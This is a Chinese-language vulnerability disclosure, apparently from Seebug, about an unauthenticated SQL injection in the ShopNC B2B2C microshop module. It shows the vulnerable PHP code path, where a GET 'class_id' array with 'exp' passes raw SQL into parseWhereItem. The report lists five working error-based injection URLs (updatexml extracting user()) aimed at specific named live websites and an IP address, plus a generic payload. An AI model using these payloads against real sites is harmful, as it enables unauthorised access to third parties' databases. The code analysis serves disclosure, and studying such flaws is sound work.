### 简要描述:
无需登录直接出数据
### 详细说明:
为了节省审核时间,先来五个实例
```
http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23
```
```
http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23
```
```
http://o.oular.com/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23
```
```
http://121.42.141.67/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23
```
```
http://m.qthtbw.com/modules/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23
```
看到
E:/wamp/www/shopnc B2B2C/modules/microshop/control/personal.php
```
public function listOp() {
$model_class = Model('micro_personal_class');
$class_list = $model_class->getList(TRUE,NULL,'class_sort asc');
Tpl::output('class_list',$class_list);
$condition = array();
if(isset($_GET['keyword'])) {
$condition['commend_message'] = array('like','%'.$_GET['keyword'].'%');
}
if(isset($_GET['class_id'])&&!empty($_GET['class_id'])) {
$condition['class_id'] = $_GET['class_id'];
}
$order = 'microshop_sort asc,commend_time desc';
if($_GET['order'] == 'hot') {
$order = 'microshop_sort asc,click_count desc';
}
self::get_personal_list($condition,$order);
Tpl::output('html_title',Language::get('nc_microshop_personal').'-'.Language::get('nc_microshop').'-'.C('site_name'));
Tpl::showpage('personal_list');
}
```
然后跟进get_personal_list
```
protected function get_personal_list( $condition, $order = "commend_time desc" )
{
$model_personal = model( "micro_personal" );
$page_number = 35;
$field = "micro_personal.*,member.member_name,member.member_avatar";
$list = $model_personal->getListWithUserInfo( $condition, $page_number, $order, $field );
Tpl::output( "show_page", $model_personal->showpage( 2 ) );
Tpl::output( "list", $list );
}
```
然后继续跟进getListWithUserInfo
```
public function getListWithUserInfo($condition,$page='',$order='',$field='*',$limit=''){
$on = 'micro_personal.commend_member_id = member.member_id';
$result = $this->table('micro_personal,member')->field($field)->join('left')->on($on)->where($condition)->page($page)->order($order)->limit($limit)->select();
return $result;
}
```
然后跟进可以看到这个函数parseWhereItem
```
protected function parseWhereItem( $key, $val )
{
$whereStr = "";
if ( is_array( $val ) )
{
if ( is_string( $val[0] ) )
{
if ( preg_match( "/^(EQ|NEQ|GT|EGT|LT|ELT|NOTLIKE|LIKE)\$/i", $val[0] ) )
{
$whereStr .= $key." ".$this->comparison[strtolower( $val[0] )]." ".$this->parseValue( $val[1] );
return $whereStr;
}
if ( "exp" == strtolower( $val[0] ) )
{
$whereStr .= " (".$key." ".$val[1].") ";
return $whereStr;
}
if ( preg_match( "/IN/i", $val[0] ) )
{
if ( isset( $val[2] ) && "exp" == $val[2] )
{
$whereStr .= $key." ".strtoupper( $val[0] )." ".$val[1];
return $whereStr;
}
if ( empty( $val[1] ) )
{
$whereStr .= $key." ".strtoupper( $val[0] )."('')";
return $whereStr;
}
if ( is_string( $val[1] ) )
{
$val[1] = explode( ",", $val[1] );
$zone = implode( ",", $this->parseValue( $val[1] ) );
$whereStr .= $key." ".strtoupper( $val[0] )." (".$zone.")";
return $whereStr;
}
if ( is_array( $val[1] ) )
{
$zone = implode( ",", $this->parseValue( $val[1] ) );
$whereStr .= $key." ".strtoupper( $val[0] )." (".$zone.")";
return $whereStr;
}
}
else if ( preg_match( "/BETWEEN/i", $val[0] ) )
{
$data = is_string( $val[1] ) ? explode( ",", $val[1] ) : $val[1];
$whereStr .= " (".$key." ".strtoupper( $val[0] )." ".$this->parseValue( $data[0] )." AND ".$this->parseValue( $data[1] )." )";
return $whereStr;
}
else
{
$error = "Model Error: args ".$val[0]." is error!";
throw_exception( $error );
return $whereStr;
}
}
else
{
$count = count( $val );
if ( in_array( strtoupper( trim( $val[$count - 1] ) ), array( "AND", "OR", "XOR" ) ) )
{
$rule = strtoupper( trim( $val[$count - 1] ) );
$count -= 1;
}
else
{
$rule = "AND";
}
$i = 0;
for ( ; $i < $count; ++$i )
{
$data = is_array( $val[$i] ) ? $val[$i][1] : $val[$i];
if ( "exp" == strtolower( $val[$i][0] ) )
{
$whereStr .= "(".$key." ".$data.") ".$rule." ";
}
else
{
$op = is_array( $val[$i] ) ? $this->comparison[strtolower( $val[$i][0] )] : "=";
$whereStr .= "(".$key." ".$op." ".$this->parseValue( $data ).") ".$rule." ";
}
}
$whereStr = substr( $whereStr, 0, -4 );
return $whereStr;
}
}
else
{
$whereStr .= $key." = ".$this->parseValue( $val );
}
return $whereStr;
}
```
如果我们传入一个数组然后val[0]=exp,其中val[1]可以写任意的sql语句。
根据以上的信息我们可以看到$condition其实是GET传进去的,我们可以传一个数组。然后构造以下exp
```
index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23
```
[<img src="https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png" alt="QQ截图20150702194117.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png" alt="QQ截图20150702194117.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png)
全部评论 (1)